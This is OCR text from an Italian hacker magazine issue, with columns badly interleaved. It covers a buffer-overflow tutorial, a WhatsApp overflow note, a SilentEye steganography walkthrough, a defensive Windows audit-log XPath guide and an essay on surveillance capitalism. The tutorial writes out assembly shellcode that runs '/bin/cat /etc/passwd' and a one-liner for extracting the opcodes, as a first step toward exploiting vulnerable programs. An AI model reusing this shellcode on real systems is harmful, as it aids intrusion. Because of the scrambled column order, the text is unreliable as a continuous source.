il disassemblaggio della funzione chiamato in causa è il 32 bit %eax che non sempre è possibile
main e della chiamata a execve. mentre %rax è a 64 bit. In realtà utilizzare direttamente per poter
Le opzioni /r e /s passate insieme %eax può essere visto come un ricavare gli opcode poiché alcuni
permettono di ottenere, “alias” dei 32 bit bassi di %rax. aspetti, come gli indirizzi, non sono
rispettivamente, gli opcode Pertanto scrivere/leggere mov noti. Per esempio, un problema di
delle istruzioni e di legare 0x3b, %eax è del tutto equivalente derivazione di uno shellcode da un

45 
 HOW TO

figura #5
La sequenza di opcode
(cioè lo shellcode) per il
programma di lettura file.

programma scritto in C è dato dalla le seguenti righe salvando il file
risoluzione dei simboli (o come Elenco_assembly.asm.
rilocazione). Telegraficamente,
alla chiamata di una funzione section .rodata
l’Assembly genera un’istruzione del align 8
tipo call indirizzo (un esempio args dq bin, arg2, 0
in [figura #2]). L’indirizzo che arg2 db “/etc/passwd”,0
appare in realtà è “solo” un offset bin db “/bin/cat”,0
che sarà risolto dal loader
(caricatore) a runtime, solo section .text
a questo punto si conosce l’esatto global _start
indirizzo. Un problema che dovrà _start:
essere raggirato e lo si può fare mov rax, 59
assegnando valori opportuni lea rdi, [rel bin]
ai registri coinvolti. lea rsi, [rel
args]
L’INDIRIZZO REALE xor edx, edx
Come tutti i programmi esistono syscall
diversi modi per ottenere
il medesimo risultato, quello La sintassi utilizzata è quella
riportato è parso il più intuitivo dell’assemblatore NASM (Netwide
poiché segue, per certi versi, Assembler). Nella sezione .rodata
il filo logico del programma C (read-only data) vengono riportate
e degli output riportati nelle costanti statiche come /etc/passwd
figure precedenti. e /bin/cat, indicate dalle etichette
Va da sé che, laddove se ne hanno arg2, con riferimento al secondo
le capacità, niente e nessuno vieta argomento della syscall execve(),
di crearne una propria versione e bin per il primo argomento, il
ottimizzata e migliorata. programma da eseguire. Va da sé
In un editor di testi si riportino che è possibile utilizzare qualsiasi
Nel corso degli anni, i buffer overflow
hanno colpito di tutto, non solo i
computer ma anche stampanti, router,
macchine fotografiche e altro ancora
etichetta ma l’obiettivo è rendere
i sorgenti coerenti tra di loro.
Lo 0 indica il terminatore di stringa
noto anche come null byte.
La direttiva db sta per declare byte
e nello specifico dichiara 8 byte
– gli 8 caratteri riportati tra doppi
apici in codice ASCII – a partire
dall’indirizzo dove è memorizzato
bin (o qualunque nome gli si voglia
dare). La direttiva dq sta per
declare quadword (una parola
a 64 bit). La sezione inizia con
la direttiva align N il cui scopo
è allineare la variabile/istruzione
successiva su un byte pari al
numero riportato. Tecnica spesso
usata per ottimizzare il
posizionamento della struttura
in memoria poiché le nuove
architetture x86 hanno una
lunghezza di parola superiore
e multipla di 8 bit (32 o 64 bit).
Ciò significa che in un’unica
posizione di memoria è possibile
memorizzare 4 o 8 byte di dati.
A questo punto inizia la sezione
.text che dice all’assemblatore di
passare al segmento dove viene
memorizzato il codice. La prima
istruzione è mov rax, 59 che già
conosciamo; memorizza nel
registro %rax il codice 59 che
identifica univocamente la
execve(). Seguono due istruzioni
lea (Load Effective Address) che

 46

calcolano l’indirizzo effettivo
del secondo operando (operando
di origine o sorgente) e lo
memorizzano nel primo operando
(operando di destinazione), un
generico registro. Nel nostro caso
non potranno essere due registri
generici ma dovranno
corrispondere ai registri del primo
e secondo argomento della
execve() ovvero %rdi e %rsi. Infine
si deve caricare il registro %rdx
con un null byte, funzione espletata
dall’istruzione xor edx, edx. Quindi
si invoca l’istruzione syscall che
ritorna il valore trovato in %rax,
ovvero 59, che lancerà la execve()
con gli argomenti presenti nei
registri %rdi, %rsi e %rdx.
VERIFICARE IL CODICE
Questo programma di poche righe
in linguaggio Assembly avrà
il medesimo funzionamento del
programma in C? Per scoprirlo
occorre dapprima assemblarlo,
funzione espletata dal comando
WHATSAPP: VULNERABILITÀ SOTTO LA LENTE!
P ersino WhatsApp è risultata vulne-
rabile a un buffer overflow. Infatti il
gruppo di ricerca di Check Point Rese-
arch (https://bit.ly/hj259_vuln) ha
scoperto una grave vulnerabilità, or-
mai risolta, capace di generare un buf-
fer overflow in caso di applicazione di
filtri alle immagini. Il problema è stato
riscontrato nella funzione applyFilte-
rIntoBuffer() della libreria libwhat-
sapp.so che accetta qualsiasi tipo di
immagine senza effettuare particolari
controlli. Possiamo dire che l’invio di
un’immagine a un contatto WhatsApp,
modificata tramite l’applicazione di fil-
tri, e il successivo reinoltro, crea di fat-
BUFFER OVERFLOW
nasm -f elf64 Elenco_assembly.
asm che, di default, creerà un file di
nome Elenco_assembly.o dal
quale è possibile creare l’eseguibile
Elenco_assembly con ld -o Elenco_
assembly Elenco_assembly.o.
Il comando ld è il linker in ambiente
GNU/Linux, ovvero il programma
che integra i moduli – cioè codice
oggetto e librerie – a cui il
programma fa riferimento al fine
di creare un eseguibile da poter
avviare. Gli interessati possono fare
riferimento a man 1 ld. A questo
punto lanciando il file Elenco_
assembly otterremo esattamente
lo stesso risultato del programma
in C [figura #4]. Un passaggio
un po’ laborioso ma che permette
di comprendere un minimo la
dinamica che c’è dietro. Rimane,
però, un ultimo passo da compiere
prima di terminare questo
appuntamento; come ricaviamo lo
shellcode? Il comando objdump -d
elenco_assembly.o -M intel
fornisce in output il disassemblato
to una possibile perdita di informazioni
sensibili. Un’immagine è vista come
un’array di dati dove ogni gruppo di 4
byte rappresenta un pixel secondo la
codifica RGBA. Pertanto, la funzione
applyFilterIntoBuffer() non considera
tale codifica e analizza l’immagine
(l’array) a blocchi di 4. Tuttavia, qualora
l’immagine sia realizzata “su misura”
in modo che ogni pixel sia di un solo
byte, la funzione tenterà di leggere 4
volte l’ammontare dello spazio nel buf-
fer sorgente. Il risultato è l’accesso a
parti di memoria non autorizzate cau-
sate da buffer overflow nella lettura
dell’immagine con pixel da 1 byte.
del codice con in più gli opcode
corrispondenti [figura #4]. Allora,
da un punto di vista di principio,
al netto di ottimizzazione e verifiche
è sufficiente copiare gli opcode
nell’ordine riportato dall’output di
objdump realizzando una stringa
in esadecimale, per esempio \xb8\
x3b\x00\x… e via a seguire. Molto
più semplicemente tramite una riga
di script di shell si può effettuare
l’estrazione automaticamente:
for i in $(objdump -d elenco_
assembly.o -M intel | grep “^
“ | cut -f2); do echo -n
‘\x’$i; done; echo
Questo script fornirà come output
la stringa visibile in [figura #5], cioè
lo shellcode completo per il
programma realizzato in C.
C’è un altro punto da risolvere:
come iniettare questo codice come
input a un programma vulnerabile?
La risposta al prossimo
appuntamento.
L’applicazione di un filtro
a un’immagine in WhatsApp
genera un pericoloso
buffer overflow.
47 
 HOW TO

L’ARTE DI NASCONDERE
I FILE DENTRO AI FILE
Che sia per veicolare informazioni cospirazioniste o per sana
voglia di comunicare in segreto con qualche amico hacker,
questa è la tecnica giusta per farlo!

L
IN BREVE  a steganografia, termine
composto dalle parole greche
Impariamo a utilizzare
il software SilentEye steganos (coperto) e grafia
per nascondere un (scrittura) ha origini antiche
messaggio all’interno (tracce di tale tecnica sono state
di un’immagine ritrovate nell’antica Grecia ai tempi
o di un file audio.
di Erodoto) ed è volta a nascondere
DIFFICOLTÀ la comunicazione tra due interlocutori,
celando il messaggio all’interno
di contenuti in apparenza normali
(articoli, immagini, testi…): solo chi
conosce la chiave per decifrare il
messaggio nascosto è in grado di
ricostruirlo e comprenderne davvero il
senso. Data la sua efficacia e, più in
generale, considerate le sue velleità
complottistiche e cospirazioniste, si è
tramandata sino ai giorni nostri,
declinandosi inevitabilmente in chiave
digitale. Quando scorrete le pagine di
un blog underground o di un sito Web
tendenzialmente borderline, siete
davvero sicuri che ciò che vedete
a schermo non contenga in realtà

Alcune dritte per un PDF, un TXT o un “video

proclama” con un piano segreto
massimizzare il risultato per sovvertire l’ordine mondiale
o boicottare il governo?

C ome si vedrà, lo “spazio” per nascondere un messaggio/file dentro

a un altro è strettamente legato agli “octets” disponibili. Per far sì
che questi siano sufficienti è necessario utilizzare immagini contenito-
CONOSCERE SPERIMENTANDO
Per capire come si fa a creare un file
re particolarmente grandi (in termini di Megapixel e quindi di spazio steganografato, non è necessario
occupato). Per crittare i dati in maniera sicura e renderli visibili in chia- digitare complesse righe di comando:
ro solo tramite inserimento di una password robusta, in fase di codifica, è possibile utilizzare dei tool
prima di premere Encode, cliccate con interfaccia grafica che
Enable encryption: lasciate la semplificano al massimo tutta
crittografia AES256 e digitate due l’operazione. Tra questi abbiamo
volte la parola chiave nei campi provato SilentEye (https://bit.ly/
Key. In fase di decodifica, per vi- silenteyesoftware), un software
sualizzare il messaggio o file na- Open Source, scritto in Qt,
scosto, sarà ovviamente necessa- disponibile per piattaforma
rio utilizzare (oltre alle opzioni di Windows, macOS e Linux.
codifica) anche la chiave AES256. Mettetelo subito alla prova.

 48

Messaggi in bottiglia?
No, in un file!
#1
Installate SilentEye sul PC ed eseguitelo. Da File >
Open caricate l’immagine (BMP o JPEG) o il file audio
(WAV) che fungerà da contenitore per il messaggio che
andrete a nascondere (PDF, TXT, DOC, immagine ecc.).
In alternativa potete trascinare il file direttamente
nell’area drag and drop e cliccare Encode.
#2
In Options potete intervenire sulla compressione del
file (JPEG quality) e su una serie di parametri necessari
a codificare il “messaggio”. Questi sono relativi alla
posizione dell’Header del file occultato, all’intervallo
di luminanza coinvolto (Luminance interval) e alla
parola chiave (Passphrare) che è personalizzabile.
#3
Nel box in basso a sinistra potete digitare il messaggio
da nascondere. In alternativa potete occultare un file
caricandolo con il pulsante in basso a destra. Tenete
d’occhio il valore degli octets disponibili: se li superate,
il file di output non sarà generato. Cliccando Encode
generate il file nel percorso indicato in Destination.
STEGANOGRAFIA
Estrazione del
contenuto segreto
#1
Ipotizzate di aver pubblicato l’immagine appena
generata sul vostro sito Web e di aver comunicato
ai lettori/seguaci (ovviamente con altri strumenti)
le informazioni necessarie per la decodifica. Ebbene,
questi non devono fare altro che installare SilentEye,
scaricare l’immagine e trascinarla nel software.
#2
Cliccando Decode, in basso a sinistra, si aprirà
la schermata per l’inserimento dei parametri.
Rispettando quanto fatto in sede di codifica, impostate
Luminance interval (k) su 16, dal menu a tendina
Header position selezionate top e in Passphrase
digitate la parola chiave utilizzata: segreto_1@.
#3
Non vi resta che cliccare su Decode in basso a destra
e attendere che il messaggio segreto appaia in chiaro
sullo schermo. Qualora le opzioni inserite non
dovessero corrispondere a quelle utilizzate in fase
di decodifica verrà visualizzato l’errore This media
don’t seem to have an hidden message.
49 
 HOW TO
Accessi al Grazie all’audit
di Windows, ricostruiamo
filesystem!
C
on la puntata di oggi
IN BREVE 
concludiamo questa serie
Impariamo a usare sull’audit di Windows, una
gli strumenti di analisi
funzionalità di grande utilità
dei log del sistema
operativo di casa per chi vuole il pieno controllo delle
Microsoft. operazioni compiute sulla propria
macchina. Questa funzionalità
DIFFICOLTÀ
non è abilitata di default (potete farlo
seguendo le istruzioni del box Attivare
l’audit), anche in considerazione dei
requisiti di memorizzazione richiesti: la
gestione dei log che tracciano le attività
degli utenti richiede un certo spazio su
disco, che è bene riservare ampliando le
dimensioni del registro Security che li
ospita (vedi il box Impostazioni del
registro). Una volta soddisfatti tali
requisiti, l’abilitazione delle funzionalità
di audit ci consente un controllo molto
dettagliato delle operazioni compiute
sul sistema, caratteristica che si presta
a una verifica della presenza di
un’eventuale attività malevola in atto
a nostra insaputa sulla macchina.
figura #1
Un esempio dell’evento
con ID 4656.
 50
le attività di ogni
utente sul filesystem
del nostro PC!
OTTAVA P
A RTE
CONTROLLI E GRANULARITÀ
La verifica di cui stiamo parlando è resa
possibile proprio dalla granularità
che il sistema di log di Windows, se
opportunamente configurato, è in grado
di offrire, consentendoci di esaminare le
registrazioni di eventi interessanti sotto
il profilo della sicurezza, come:
• i tentativi di login sul PC (distinguendo
tra quelli avvenuti con successo e quelli
negati), così come i successivi logoff;
• la creazione di utenti e/o gruppi
di sicurezza e la loro cancellazione;
• l’aggiunta e la rimozione di un utente
da un gruppo;
• la rimozione dei log dal registro;
• l’avvio di programmi e, più in generale,
l’utilizzo del filesystem, distinguendo
gli accessi sino a livello di file.
Nostro inseparabile compagno in
queste verifiche è Event Viewer (vedi
il box omonimo), che talvolta abbiamo
integrato usando PowerShell.
EVENTI & FILESYSTEM
Attraverso tali strumenti, nelle ultime
puntate ci siamo lanciati nell’analisi degli
eventi connessi al filesystem, di cui
abbiamo avviato la registrazione
configurando (come descritto nel box
Audit & filesystem) l’audit sulla
directory C:\IMPORTANTE della
macchina virtuale utilizzata per i test.
In questo modo abbiamo avuto la
possibilità di individuare e studiare gli
eventi d’interesse in un’indagine di
questo tipo, caratterizzati dagli ID:

• 4656, “An handle to an object was
requested” [figura #1], generato
ogniqualvolta un utente prova
ad accedere a una risorsa (come
un file oppure una directory)
sottoposta ad audit;
• 4663, “An attempt was made
to access an object” [figura #2],
prodotto invece quando si
concretizza il tentativo d’accesso
loggato dall’evento 4656;
• 4658, “The handle of an object
was closed” [figura #3], che infine
segnala l’avvenuta chiusura di un
file, tracciando il momento in cui
il processo e l’utente individuati
dall’evento 4656 hanno terminato
di utilizzare l’oggetto.
CONTENUTI INFORMATIVI
Ciascuno di questi eventi fornisce
tutte le informazioni necessarie a
ricostruire l’attività compiuta sul
sistema (e sul filesystem), tra le
quali vale la pena di citare:
• i dati del soggetto che ha provato
a eseguire l’operazione tracciata
(solitamente individuato all’interno
della sezione Subject);
• la descrizione dell’oggetto
LOG DI WINDOWS
tuttavia, non si trova nell’esame dei
singoli eventi, quanto piuttosto
nell’individuazione – all’interno
delle migliaia di voci di log presenti
nel registro Security – degli eventi
relativi all’oggetto d’interesse e
nella loro successiva correlazione.
HANDLE ID
Per fortuna tra le informazioni
riportate nella sezione Object di
figura #2 ciascun evento è presente un
campo denominato Handle ID, in
Un esempio dell’evento grado di identificare univocamente
con ID 4663.
un oggetto tra due reboot
consecutivi della macchina.
Con l’Handle ID di un file, quindi,
interessato dall’attività (nella è possibile ricostruire tutte
sezione Object); le attività compiute su di esso
• il nome del programma dal momento dell’avvio del sistema
attraverso il quale l’accesso è stato operativo sino al successivo
richiesto o si è concretizzato reboot. Utilizzando questo
(sezione Process Information); stratagemma, nella scorsa puntata
• la tipologia di accesso richiesto siamo riusciti a realizzare una
(sezione Access Request query XPath [figura #4]
Information). per ricostruire tutti gli accessi
Insomma: osservando effettuati su un file sensibile,
attentamente gli eventi 4656, 4663 che abbiamo poi scoperto essere
e 4658 è possibile ottenere una stato consultato da utente2,
“fotografia” molto dettagliata l’utente di prova utilizzato
di quanto avvenuto sul nostro nei nostri test per simulare l’attività
filesystem. La vera difficoltà, di un attore malevolo.
Attivare l’audit
Prima di lanciarci nell’analisi dei log di Windows è necessario attivare
le funzionalità di audit del sistema operativo, mediante le seguenti
operazioni:
• effettuare il login alla macchina Windows 10 come amministratore;
• avviare il Local Group Policy Editor digitando il comando gpedit.msc
nella barra di avvio rapido;
• selezionare, nel menu a sinistra, il percorso Computer Configuration >
Windows Settings > Security Settings > Local Policies > Audit Policy;
• fare doppio click su ciascuna voce comparsa nel pannello destro della
finestra (tranne la voce “audit directory service access”, che non ci
interessa in quanto non stiamo analizzando dei PC attestati a un
dominio) e selezionare, nella finestra di dialogo che verrà visualizzata,
entrambe le opzioni Success e Failure;
• chiudere la finestra.
51 
 HOW TO
FOCUS SULL’UTENTE
figura #3 Si tratta di un ottimo risultato,
ma se volessimo di più? Sebbene
per determinati file (come quello
relativo alle credenziali bancarie)
sia opportuna una verifica ad hoc,
nella stragrande maggioranza dei
casi più che il singolo file quello che
ci interessa è il quadro d’insieme:
capire, cioè, quali siano le
operazioni (tutte le operazioni!)
compiute da un utente sul
filesystem. In questo modo
è possibile comprendere, per
esempio, se sia stato installato
un qualche programma malevolo,
invocato un determinato
programma di sistema, inseriti
nuovi file o modificati quelli
esistenti: esattamente quel tipo di
attività associate a un’intrusione.
Un esempio dell’evento
con ID 4658. QUERY XPATH
Per spostare il focus delle nostre
interrogazioni dal file all’utente è
necessaria una modifica alla query
Audit & filesystem XPath realizzata nella scorsa
Per poter esaminare i log degli accessi al filesystem, dobbiamo innanzitutto puntata, che sostituisca la
attivare l’audit su (almeno) una delle directory del nostro disco. A tal fine: condizione relativa all’Handle ID
• creiamo una directory ad hoc sotto il disco C: che chiameremo con una in grado di filtrare i soli
IMPORTANTE, quindi clicchiamo con il tasto destro del mouse sulla cartella eventi prodotti da Windows a
e selezioniamo dal menu contestuale la voce Properties;
seguito delle attività di utente2.
• selezioniamo il tab Security e clicchiamo il pulsante Advanced;
• nella nuova finestra così visualizzata dobbiamo selezionare – ancora una Qualcosa del genere, insomma:
volta – il tab Auditing, avendo cura di confermare la nostra scelta mediante
la pressione del tasto Continue; <Query List>
• finalmente avremo accesso alla finestra per l’impostazione dell’audit sulla <Query Id=“0”
directory: premiamo il pulsante Add per aggiungere quella che Windows
chiama audit entry, quindi clicchiamo Select a principal per selezionare Path=“Security”>
il target dell’audit (è sufficiente digitare il nome users nel campo Enter the <Select
object name to select e premere successivamente Check names per Path=“Security”>
vedere finalmente selezionato il gruppo Users della nostra macchina
locale, e sottoporre così ad audit ogni accesso degli utenti sulla cartella);
*[System[(EventID>0)]]
• confermiamo la nostra scelta premendo il pulsante OK quindi, una volta
tornati alla finestra per l’impostazione dell’audit, assicuriamoci di and
selezionare i checkbox relativi alle attività che intendiamo monitorare, *[EventData[Data[@
ovvero: read & execute, list folder contents, read, write; Name=‘SubjectUserName’
• premiamo il tasto OK per confermare le operazioni compiute e chiudere ]=‘utente2’]]
tutte le finestre aperte nel corso del procedimento;
• riempiamo la nostra directory con un congruo numero di file </Select>
da monitorare. </Query>
</Query List>

 52

In questo codice, per l’appunto,
viene chiesto di mostrarci qualsiasi
evento (System[(EventID>0)])
imputabile a utente2
(EventData[Data[@
Name=‘HandleId’]=’0x11c’).
EVENT VIEWER
Per eseguire la query dobbiamo
innanzitutto avviare Event Viewer.
Il procedimento da seguire non
è complesso:
• dalla schermata principale
del programma, selezioniamo
il registro Security (percorso
Windows Logs | Security sul
figura #4
La query XPath per
individuare gli accessi al file
con Handle ID pari a 0x11c.
figura #5
Con la query effettuata
abbiamo ridotto gli eventi
visualizzati, ma sono
ancora troppi per un
esame manuale.
pannello sinistro), quindi
premiamo il pulsante Filter
current log per avviare
una query guidata;
• inseriamo un ID da filtrare
a piacere, per esempio il 4656;
• spostiamoci sul secondo tab,
denominato XML, in modo da
visualizzare la query XPath
corrispondente ai criteri di filtro
sinora inseriti;
• selezioniamo la check box Edit
query manually, quindi inseriamo
l’interrogazione che abbiamo
appena elaborato.
A questo punto, se clicchiamo sul
LOG DI WINDOWS
Impostazione
del registro
Per impostare una dimensione
adeguata del registro Security, è
sufficiente avviare Event Viewer,
fare click con il pulsante destro
sul nome del registro, quindi
selezionare la voce Properties
dal menu contestuale che viene
visualizzato. Per modificare
la lunghezza massima occorre
agire sul valore Maximum log
size (KB): impostiamolo
a 100.032 KB, ovvero 100 MB.
In questo modo possiamo
garantire una dimensione
adeguata per i nostri
esperimenti, evitando che alcuni
degli eventi da noi prodotti
possano essere sovrascritti (e
quindi vadano “persi”) a causa
dell’esiguità del limite impostato
di default da Windows.
pulsante OK, possiamo finalmente
vedere il risultato dell’esecuzione
della query: nonostante le
accortezze che abbiamo adottato,
il numero di eventi ottenuto [figura
#5] risulta ancora troppo elevato
per un esame manuale.
FILTRO AGGIUNTIVO
Per restringere i risultati della
nostra interrogazione, dobbiamo
necessariamente aggiungere
un’ulteriore condizione in grado di
circoscrivere gli eventi d’interesse,
eliminando quelli superflui. Per
esempio, se siamo interessati alle
attività poste in essere da utente2
sul prompt dei comandi (un tool
spesso utilizzato dagli attaccanti
nel corso di un’intrusione),
possiamo affinare la query
in questo modo [figura #6]:
<Query List>
<Query Id=“0”
53 
 HOW TO
Event Viewer
Il tool che utilizziamo in questa
serie per accedere al registro
Security di Windows è Event
Viewer, che può essere avviato
direttamente dal menu Start
di Windows, inserendone
il nome all’interno della barra
d’avvio rapido (se il sistema
operativo è in italiano,
il nome da utilizzare è invece
Visualizzatore d’eventi).
L’applicazione si presenta
suddivisa in vari riquadri:

figura #6 • un riquadro sinistro, attraverso

il quale è possibile selezionare
la tipologia di log da consultare
Ecco la nostra query XPath con
(Windows li raccoglie in cinque
una seconda condizione che
grandi gruppi, ma noi siamo
ne consente un ulteriore
interessati solo al registro
affinamento. denominato Security);
• un riquadro destro, che fornisce
scorciatoie per le principali
attività eseguibili sui log;
• due riquadri centrali, uno
Path=“Security”> dei comandi – su uno specifico file. superiore (per la visualizzazione
<Select La query, in questo caso, diventa dell’elenco degli eventi del
registro d’interesse) e uno
Path=“Security”> [figura #8]:
inferiore (in cui vengono
mostrate le informazioni di
*[System[(EventID>0)]] <Query List> dettaglio di ciascun singolo
and <Query Id=“0” evento selezionato).
*[EventData[Data[@ Path=“Security”>
Name=‘SubjectUserName’ <Select *[EventData[Data[@
]=‘utente2’]] Path=“Security”> Name=‘SubjectUserName’
and ]=‘utente2’]]
*[EventData[Data[@ *[System[(EventID>0)]] and
Name=‘ProcessName’]=‘C:\ and *[EventData[Data[@
Windows\System32\cmd.exe’]]
</Select>
</Query>
</Query List>

ottenendo un numero di risultati

decisamente più ristretto [figura
#7], nonché più focalizzato sulla
nostra specifica esigenza.

TERZA CONDIZIONE
figura #7
Ma possiamo fare anche di meglio: Adesso abbiamo
un’ottantina di eventi:
scoprire quali delle attività
si può fare ancora di
presentate in output siano state meglio?
compiute – utilizzando il prompt

 54
 LOG DI WINDOWS
Name=‘ProcessName’]=‘C:\
Windows\System32\cmd.exe’]]
and
*[EventData[Data[@
Name=‘ObjectName’]=‘C:\
IMPORTANTE\file_importante.
txt’]]
</Select>
</Query>
</Query List>

ed è in grado di restringere
figura #8 i risultati ad appena due eventi
[figura #9].
La query XPath con la terza e
ultima condizione.
TIPO DI ACCESSO
Vale la pena soffermarsi sui risultati
di questa query. Gli eventi ottenuti,
infatti, possono dirci molto circa
le attività effettivamente compiute
da utente2 sul file. Non solo
sappiamo che l’utente ha richiesto
di accedere al file C:\IMPORTANTE\
file_importante.txt (come
testimonia l’evento 4656) ma anche
che ha concretamente esercitato
l’accesso richiesto (evento 4663).
figura #9 Si tratta di due informazioni già di
Adesso sì che si può per sé abbastanza allarmanti, ma
esaminare manualmente cosa è stato fatto sul file di preciso?
l’output della query: si Qualcuno ha alterato le nostre
tratta di due soli eventi! credenziali (che magari abbiamo
difficoltà a ricordare, ecco perché
erano state appuntate proprio su
quel file) per impedirci di accedere
mentre fa incetta dei nostri
risparmi? Per “fortuna” non è così:
utente2 si è limitato ad accedere
in lettura, come conferma l’evento
4656, in cui sono riportati
esplicitamente i permessi richiesti
sul file. Come possiamo notare
[figura #10] si tratta di permessi
figura #10 di lettura (read): dunque il file
dovrebbe essere ancora integro,
L’accesso al file da parte
sebbene i suoi contenuti siano
dell’utente malevolo è
avvenuto in lettura.
adesso noti a una persona non
autorizzata…

55 
 HACKULTURE

FACEBOOK
E IL MALE,
MA GOOGLE
E I L S U O M A E S T R O
ll or i? M ar k Zu ck er be rg ha imparato
ntro
Chi controlla i nuovi co i da ti da ll e pe rs one grazie al lavoro
iz za re
come estrarre e monet ag e e Se rg ei Brin. L’ignoranza
La rr y P
fatto venti anni fa da
en ti da se m pr e è cr uciale per il successo
degli ut

M
ark Zuckerberg di dollari) è una delle ragioni che lasciamo dietro di noi ogni
è il primo follower per cui le loro attività sono giorno e da algoritmi segreti
di Sergei Brin pericolose. Google e poi che costruiscono profili
e soprattutto Facebook lavorano alla fantasma della nostra vita,
di Larry Page. L’azienda-una- costruzione di quella che è stata anche a nostra insaputa,
volta-conosciuta-come- definita da Shoshana Zuboff, per la pubblicità ma anche
Facebook, cioè Meta, è in realtà professoressa della Harvard per la manipolazione diretta,
un modo per riprendere Business School e autrice del non solo commerciale.
da dove è arrivato Google libro Il capitalismo della
e potenziare al massimo sorveglianza, la “più grande FRANCES HAUGEN
l’estrazione dei dati. infrastruttura della storia Le rivelazioni dei wistleblower
La dimensione di queste per l’estrazione dei dati come Frances Haugen hanno
aziende (Facebook ha una dalle persone”. Una macchina mostrato, a partire dal 2016,
capitalizzazione di mercato gigantesca, alimentata dal una serie infinita di documenti
superiore ai mille miliardi numero infinito di tracce digitali che mostrano come Google,
Facebook e in misura
Il Web 3.0 sarà veramente il modo relativamente inferiore anche
Amazon e Microsoft,
di porre fine al capitalismo della estraggano e utilizzino
sorveglianza? Non ne siamo sicuri... le informazioni create

 56

o riconducibili ai
comportamenti degli utenti
per poter generare pubblicità
mirate oltre che manipolare
il flusso delle informazioni
in maniera tale che aumenti
l’engagement sulle piattaforme,
il consumo e di conseguenza
il guadagno. Secondo
la professoressa Zuboff,
“non c’è modo di fuggire da
questo sistema che ci controlla,
sia che stiamo facendo
la spesa, guidando l’auto,
camminando nel parco,
guardando un film rilassandoci
con la nostra famiglia”. Tutte
le modalità di partecipazione
economica e sociale alla vita
comune sono filtrate dal
capitalismo della sorveglianza
che tramite gli strumenti
digitali “ha l’obiettivo di
massimizzare il profitto”
seguendo un processo
che negli ultimi due anni
di pandemia “ha bruscamente
accelerato”.
IL GOVERNO NON
NE SA NIENTE
Il problema di una Internet
senza regolamentazioni
è che, in nome della libertà, è
diventata in realtà un Far West
in cui vige la legge del più forte.
Gli utenti non contano niente,
i concorrenti sono schiacciati
perché hanno un ritardo
eccessivo e vengono tenuti
fuori gioco con pratiche
monopoliste anticompetitive,
e i governi sono accecati.
L’informazione è il bene
a p it a li sm o d e ll a so rveglianza
Il c
e l’economia dell’inte
Che differenza c’è tra il motore
di ricerca di Google e il wall
di Facebook? All’apparenza
non potrebbero essere più
diversi: Google è tutto bianco,
Facebook è blu. Google serve
per cercare cose che “ci
servono”, Facebook invece ci fa
vedere cosa stanno facendo i
nostri amici (che foto postano,
quali commenti, quali video,
quali screenshot). In realtà,
sono esattamente la stessa
cosa. L’unica differenza è che
Facebook ci mostra quello che
ci interessa senza bisogno di
doverglielo chiedere, mentre
a Google è necessario fare una
domanda, almeno all’inizio.
Ma anche questo è sempre
meno vero, perché in realtà
aprendo YouTube (che è di
Google), questo servizio utilizza
la profilazione creata dai
cookie e da altre tecniche
di registrazione delle nostre
attività per generare
automaticamente una lista di
DATI PERSONALI
da governare e organizzare
con la partecipazione di tutti,
in maniera democratica ma,
dice Zuboff, siamo esattamente
all’opposto: sono pochissimi
che decidono cosa fare e tutti
gli altri sono vittime tenute
all’oscuro.
NON È UNA TEORIA
DEL COMPLOTTO
Mentre Facebook e gli altri
social (ma anche i risultati di
Google) sono uno strumento
perfetto per disseminare e far
crescere le teorie del complotto
più cervellotiche, quello che
succede realmente non si
capisce più. Eppure, come
nzione
possibili occasioni di vendita
e di ulteriore esposizione alla
pubblicità e profilazione. La
maggior parte delle soluzioni
utilizzate dalle due aziende
non fa altro che estrarre dati
dalla vita “reale” delle persone
e costruire una forma di
capitalismo della sorveglianza,
che oltretutto distorce le
informazioni per aumentarne
l’engagement.
 HACKULTURE
Che cos’è Google?
Douglas Edwards, primo
brand manager di Google, nel
suo libro “I’m Feeling Lucky”
racconta cosa ha risposto
alla domanda “Cos’è Google?”
Larry Page, uno dei due
co-fondatori dell’azienda.
“Storage e fotocamere digitali
costano sempre meno.
Le persone genereranno
quantitativi enormi di dati.
Tutto quello che vedono
o sentono o di cui fanno
esperienza diventerà
cercabile. Tutta la loro vita
diventerà cercabile”. Il
business di Google è diventato
questo: anziché vendere
prodotti ai suoi clienti, li
sorveglia per rivendere i dati
acquisiti a terzi e guadagnarci
sopra. E i modi e le tecnologie
con cui lo fa sono tenute
nascoste agli utenti, ai
concorrenti e al legislatore.
Secondo Edwards, Larry Page
“si è sempre opposto in tutti
i modi a qualsiasi soluzione
che potesse mettere in
pericolo la capacità di Google
di raccogliere dati”. Il lavoro
di Google è stata fonte di
ispirazione per innumerevoli
startup, inclusa Facebook.
 58
il proverbiale elefante
nel mezzo della
stanza, è la raccolta
e la manipolazione
dei dati, gestita
attraverso strumenti
totalmente fuori
controllo, a governare
sempre più le nostre società.
Se c’è un momento che gli
storici devono segnarsi è il
2008, quando Zuckerberg aveva
un problema. Gli utenti di
Facebook crescevano molto
velocemente ma i profitti erano
sempre a zero. Intanto, Google
diventava ogni giorno più
grande e più ricca. Per uscire
da questo blocco, Zuckerberg
ha assunto la responsabile
mondiale della pubblicità
online di Google, cioè Sheryl
Sandberg, che oggi è il suo
primo ufficiale. Da quel
momento, così come Google,
anche Facebook è diventata
sempre più aggressiva non solo
nella raccolta dei dati delle
persone ma anche nella loro
manipolazione e rivendita.
IL FUTURO
L’enorme quantità di soldi
accumulata da Facebook
e Google ha dimostrato
che il capitalismo della
sorveglianza paga.
E oggi tutte le aziende,
grandi o piccole, vogliono
la loro fetta: mutue, ospedali,
assicurazioni, banche,
produttori di auto, vendita
al dettaglio, agricoltura,
persino la scuola. Tutti capaci
di trasformare un’attività
economica “umana” in un
Moloch digitale che controlla
e manipola i dati. Senza
nessuno che controlli questi
nuovi controllori.
RACCOLTA
PDF
HACKER
JOURNAL
Acquista la raccolta
PDF digitale del 2020
12 numeri a soli 7,90 €
anziché 46,80 € vai su
www.hackerjournal.it/raccoltapdf2020
 ABBONATI
ALLA TUA RIVISTA PREFERITA
TE LA SPEDIAMO APPENA STAMPATA!

CONSEGNA GARANTITA ENTRO 48H

Con l’abbonamento
cartaceo la versione
digitale è in OMAGGIO!

Riceverai 12 numeri a soli

DISPONIBILE ANCHE SOLO
IN VERSIONE DIGITALE

-28% -57%
CARTACEO DIGITALE
12 numeri 12 numeri
solo 33,90€ solo 19,90€
invece di 46,80€ invece di 46,80€

Scansiona il QrCode per abbonarti oppure contattaci

Telefono online email WhatsApp
02 87168197 www.sprea.it/hackerjournal abbonamenti@sprea.it 329 3922420
Solo messaggi
